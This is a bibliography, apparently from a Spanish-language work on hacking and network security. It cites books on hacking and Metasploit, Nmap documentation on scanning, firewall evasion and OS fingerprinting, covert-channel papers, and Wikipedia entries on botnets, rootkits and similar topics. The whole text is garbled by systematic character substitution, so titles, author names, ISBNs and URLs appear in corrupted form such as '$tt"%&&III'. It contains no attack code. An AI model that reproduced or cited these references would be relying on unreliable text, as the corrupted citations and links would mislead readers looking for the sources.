4ilson# Martin !oulin# $tt"s%&&III2.sans.org&readingUroo &I$ite"a"ers&$ac6ers&055."$" =ACRUBE4%=ac6ers BeIare. Eric Cole# 2..*# 7,B@%.(+-5+(*..0(.# $tt"%&&boo6s.google.co .ar&boo6sYida/@<u2r$'d1VC =ACRUEF=7C%F$e =ac6er Et$ic and t$e ,"irit o/ t$e 7n/or ation Age. =i anen# !e66aH Forvalds# :inusH Castells# Manuel# 2..*# 7,B@%7,B@ .(-+5(5.5JJ(.# $tt"%&&III.a azon.co &=ac6er(Et$ic(!e66a(=i anen&d"&.-+55.5JJ. =ACRUEA!%=ac6ing E9"osed. ,tuart McClure# Joel ,ca bra'# Peorge Rutz# 2..5# 7,B@%0+O..+22J.O*J# $tt"%&&III.a azon.co &=ac6ing(E9"osed(5t$&d"&..+22J.O*5 =ACRU,FACR%=ac6 t$e ,tac6. Mic$ael Pregg# ,te"$en 4at6ins# Peorge Ma's# C$ris <ies# <on Bandes# Brandon Fran6lin# 2..J# 7,B@%*(50+10(*.0(O# $tt"%&&boo6s.google.co .ar&boo6sY idatU.=Kn4Cd2oC

=5U@MA!%=ost 5iscover' Iit$ n a". Autor% Mar6 4ol/gang# $tt"%&&n a".org&docs&discover'."d/ 7!U,!??F% 7! ,"oo/ing% An 7ntroduction# $tt"%&&aandrtec$.org&Fec$&@etIor6ing&@etIor6s ]2.*]2.(]2.!rog(1*2&=andouts&7!]2.,"oo/ing."d/ 7,?CU,FAF% ?//ice Ior6ers give aIa' "assIords /or a c$ea" "en# $tt"%&&III.t$eregister.co.u6&2..-&.1&*O&o//iceUIor6ersUgiveUaIa'U"assIords& 7F,UM7F%7F, ,tatus <e"ort. Autor% 5onald E. Eastla6e# /t"%&&"ublications.ai. it.edu&ai( "ublications&"d/&A7M(2-O."d/ Rern% F$e :inu9 Rernel# $tt"%&&III.6ernel.org& RMUA?5%F$e Art o/ 5ece"tion% Controlling t$e =u an Ele ent o/ ,ecurit'. Revin Mitnic6# 4illia :. ,i on# ,teve 4oznia6# 2..2# 7,B@%.(1+*(2-+*2(1# $tt"%&&boo6s.google.co .ar&boo6sYidaJ2FQMvQcVg2C :ELKU=ACR%=ac6ers% =eroes o/ t$e Co "uter <evolution.. ,teven :ev'# *0O1# 7,B@%.-O5-*2*.5# $tt"%&&III.gutenberg.org&ete9t&+20 :?PUMAPUA!!F7@P%7denti/iable Finger"rints in @etIor6 A""lications. Autor% Jason 5a ron# $tt"%&&III.useni9.org&"ublications&login&2..-(*2&"d/s&da ron."d/ MEFAU5ELP%Metas"loit -.. 5evelo"eris Puide. Autor% F$e Metas"loit ,ta//# $tt"%&&III. etas"loit.org&docu ents&develo"ersUguide."d/ MEFAUF??:%Metas"loit Fool6it. 5avid Ma'nor# R.R. Moo6$e'# Jaco"o Cervini# Fairuzan <oslan# Revin Beaver# 2..+# 7,B@%0+O(*(50+10(.+1(.# $tt"%&&III.a azon.co &Metas"loit( !enetration(5evelo" ent(Lulnerabilit'(<esearc$&d"&*50+10.+1* M2:U=7,% Multics =istor'# $tt"%&&III. ulticians.org&$istor'.$t l M2:U7@F<?% 7ntroduction and ?vervieI o/ t$e Multics ,'ste # $tt"%&&III. ulticians.org&/jcc*.$t l M2:UF7ME% Multics C$ronolog'# $tt"%&&III. ulticians.org&c$rono.$t l @MA!UF4EL%@ a" ( FireIall&75, Evasion and ,"oo/ing. Autor% n a".org# $tt"%&&n a".org& an& an(b'"ass(/ireIalls(ids.$t l @MA!U75:E% 7dle ,canning and <elated 7!75 Pa es# $tt"%&&n a".org&idlescan.$t l @MA!U@,E%@ a" ,cri"ting Engine. Autor% @ a".org# $tt"%&&n a".org&nse& @MA!U?,*%<e ote ?, detection via FC!&7! ,tac6 Finger!rinting ( First Peneration. Autor% F'odor# $tt"%&&n a".org&n a"(/inger"rinting(old.$t l @MA!U?,2%<e ote ?, 5etection using FC!&7! Finger"rinting ;2nd Peneration>. Autor% F'odor# $tt"%&&n a".org&osdetect&inde9.$t l @MA!UL,CA@%@ a" ( ,ervice and A""lication Lersion 5etection. Autor% @ a".org# $tt"%&&n a".org&vscan&inde9.$t l ?BUC<AK%?bituar' ( ,e' our Cra'# Fat$er o/ su"erco "uting. Autor% C$ris :azou# $tt"%&&III.$oise.co &"ri eur&0J&"r(0J(oct&C:(!<(*.(0J(-.$t l !5!U!:A% !5! !lanet# $tt"%&&III."d""lanet.org& !5!*.(!<M%5ECs'ste (*.# 5EC,K,FEM(2. !rocessor <e/erence Manual. 5igital Equi" ent Cor"oration# *0JO# *0+*# *0+1# *0+O# *0O2# 7,B@%# $tt"%&&"d"*..nocreI.org&docs&ad($-0*a(t*."d/ !5!*.(4eb% F$e 5EC !5!(*. E ulation 4eb"age# $tt"%&&III.aracnet.co &`$eal'z$&"d"*.e u.$t l !5!**(=BR%5igital Equi" ent Cor"oration !5!(** Manual. Autor% 5igital Equi" ent Cor"oration# $tt"%&&researc$. icroso/t.co &users&PBell&5igital&5ECMuseu .$t

!<RU10%!ort ,canning Iit$out t$e ,K@ /lag. Autor% 2riel Mai on# $tt"%&&III."$rac6.org&issues.$t lYissuea10Wida*5carticle <FCU+0-% Frans ission Control !rotocol% Functional ,"eci/ication# $tt"%&&tools.iet/.org&$t l&r/c+0-c"age(J5 <7@PU?,% <ing out t$e old# <7@P in t$e @eI% ?, Finger"rinting t$roug$ <F?s# $tt"%&&III."lanb(securit'.net&I"&ring.$t l <7@PU?,F@P%@eI Fool And Fec$nique For <e ote ?"erating ,'ste Franc6 Le'sset# ?livier Courta'# ?livier =een# $tt"%&&III.l.t-6.org&biblio&/inger"rinting&englis$&ring(/ull("a"er."d/ <?4UC?LC=%Covert C$annels in t$e FC!&7! !rotocol ,uite. Autor% Craig =. <oIland# $tt"%&&III./irst onda'.org&issues&issue2U5&roIland& ,A7:UM2,% ,A7: Co "uter =istor' E9$ibits# $tt"%&&in/olab.stan/ord.edu&"ub&vo'& useu .$t l ,A@,UAMA!%7ntrusion 5etection FAV% 4$at is AMa" and $oI does it /inger"rint a""licationsY. Autor% Antonia <ana# $tt"%&&III.sans.org&resources&id/aq&a a"."$" ,A@,UC?LC=%7ntrusion 5etection FAV% 4$at is covert c$annel and I$at are so e e9a "lesY. Autor% A an Abdulla# $tt"%&&III.sans.org&resources&id/aq&covertUc$an."$" ,A@,U,CA@<A@5%7ntrusion 5etection FAV% 4$at is ,canrandY. Autor% Mic$ael 4isener# $tt"%&&III.sans.org&resources&id/aq&scanrand."$" ,A@,UF?!*.%F$e Fen Most 7 "ortant ,ecurit' Frends o/ t$e Co ing Kear. Autor% ,A@, 7nstitute 2..J# $tt"%&&III.sans.org&resources&*.Usecurit'Utrends."d/ ,ECU!F%,ecurit' !oIer Fools. Br'an Burns# Jenni/er ,tisa Pranic6# ,teve Manzui6# !aul Puersc$# 5ave Rillion# @icolas Beauc$esne# Eric Moret# Julien ,obrier# Mic$ael :'nn# Eric Mar6$a # C$ris 7ezzoni# and !$ili""e Biondi# 2..+# 7,B@%.(50J(..0J-(*# $tt"%&&III.oreill'.co &catalog&0+O.50J..0J-2& ,ECU4A<%,ecurit' 4arrior. C'rus !ei6ari# Anton C$uva6in# 2..1# 7,B@%.(50J(..515(O# $tt"%&&III.oreill'.co &catalog&sIarrior&inde9.$t l ,@CU75:E%,ecrets o/ @etIor6 Cartogra"$'% A Co "re$ensive Puide to @ a". Ja es Messer# 2..+# 7,B@%# $tt"%&&III.netIor6u"ti e.co &n a"&inde9.s$t l ,2@U:7@R% 4$ic$ is better# static or d'na ic lin6ingY# $tt"%&&sunsite.ua6o .s6&sunIorldonline&sIol(.2(*00J&sIol(.2("er/.$t l FC!&7!U7ll%FC!&7! 7llustrated# Lol. *% F$e !rotocols. 4.<ic$ard ,tevens# *001# 7,B@%.2.*J--1J0# $tt"%&&III.6o$ala.co &start&tc"i"iv*.$t l 2@7C?<@U5EFC?@% 7ntroducing 2nicornscan# $tt"s%&&III.de/con.org&i ages&de/con(*-&dc*-( "resentations&5CU*-(:ee."d/ 2ni9-2v%A 2@7Aj ?"erating ,'ste /or t$e 5EC LAA(**&+O. Co "uter. Autor% F$o as B. :ondon# Jo$n F. <eiser# $tt"%&&III.cs.bell(labs.co &I$o&d r&ot$er"orts&-2v.$t l 47R7UB@EF% Botnet# $tt"%&&en.Ii6i"edia.org&Ii6i&Botnet 47R7UC?LC=% Covert C$annel# $tt"%&&en.Ii6i"edia.org&Ii6i&CovertUc$annel 47R7U52M!% 7n/or ation 5iving# $tt"%&&en.Ii6i"edia.org&Ii6i&7n/or ationUdiving 47R7UE@% E@7AC# $tt"%&&en.Ii6i"edia.org&Ii6i&Eniac 47R7UEA!:%E9"loit ;Co "uter ,cience>. Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&E9"loitU;co "uterUscience> 47R7UFF!C% :ist o/ FF! server return codes# $tt"%&&en.Ii6i"edia.org&Ii6i&:istUo/UFF!UserverUreturnUcodes Finger"rinting. Autor%

47R7U=CC% =o ebreI Co "uter Club# $tt"%&&en.Ii6i"edia.org&Ii6i&=o ebreIUCo "uterUClub 47R7U7CM!%7nternet Control Message !rotocol ( 7CM!. Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&7nternetUControlUMessageU!rotocol 47R7U7!v1%7!v1 !rotocol. Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&7!v1 47R7U7F,%7nco "atible Fi es$aring ,'ste . Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&7nco "atibleUFi es$aringU,'ste 47R7UR:?P% =ardIare 6e'logger# $tt"%&&en.Ii6i"edia.org&Ii6i&=ardIareU6e'logger 47R7U:7@% 4i6i"edia% :inu9# $tt"%&&es.Ii6i"edia.org&Ii6i&:inu9 47R7U:?CR% :oc6 !ic6ing# $tt"%&&en.Ii6i"edia.org&Ii6i&:oc6U"ic6ing 47R7U:F% :inus Forvalds# $tt"%&&en.Ii6i"edia.org&Ii6i&:inusUForvalds 47R7UM!=K% Mur"$'Ms :aIs# $tt"%&&en.Ii6i"edia.org&Ii6i&Mur"$'MsUlaI 47R7UM2:%Multics. Autor% # $tt"%&&en.Ii6i"edia.org&Ii6i&Multics 47R7U@C% netcat# $tt"%&&en.Ii6i"edia.org&Ii6i&@etcat 47R7U!5!% ,erie !5!# $tt"%&&en.Ii6i"edia.org&Ii6i&!rogra 47R7U<R7F% <oot6it# $tt"%&&en.Ii6i"edia.org&Ii6i&<oot6it 47R7U,,F% ,$oulder sur/ing# $tt"%&&en.Ii6i"edia.org&Ii6i&,$oulderUsur/ingU ]2Oco "uterUsecurit']20 47R7UFC!%FC! ( Frans ission Control !rotocol. Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&Frans issionUControlU!rotocol 47R7UFE:@EF% Felnet# $tt"%&&es.Ii6i"edia.org&Ii6i&Felnet 47R7UF?!,*.% # $tt"%&&en.Ii6i"edia.org&Ii6i&F?!,(*. 47R7UF<?K% Frojan $orse ;co "uting># $tt"%&&en.Ii6i"edia.org&Ii6i&FrojanU$orseU ]2Oco "uting]20 47R7UFA.%FA(.. Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&FA(. 47R7U25!%25! !rotocol. Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&2serU5atagra U!rotocol 47R7U24% 2ni9 4ars# $tt"%&&en.Ii6i"edia.org&Ii6i&2ni9UIars 47R7U2A% 4i6i"edia% 2ni9# $tt"%&&en.Ii6i"edia.org&Ii6i&2ni9 47R7UL7<2,% Co "uter Lirus# $tt"%&&en.Ii6i"edia.org&Ii6i&Co "uterUvirus 47R7UL2:@%Lulnerabilit' ;Co "uting>. Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&Lulnerabilit'U;co "uting> 47R7U4?<M% Co "uter 4or # $tt"%&&en.Ii6i"edia.org&Ii6i&Co "uterUIor 47R7UQ?MB7E% Qo bie Co "uter# $tt"%&&en.Ii6i"edia.org&Ii6i&Qo bieUco "uters A!A<C4EB% Aero9 !alo Alto <esearc$ Center# $tt"%&&III."arc.co &about&$istor'& edU5ataU!rocessor 47R7U!7P% !igg'bac6ing ;securit'># $tt"%&&en.Ii6i"edia.org&Ii6i&!igg'bac6ingU]2Osecurit']20

Sign up to vote on this title
UsefulNot useful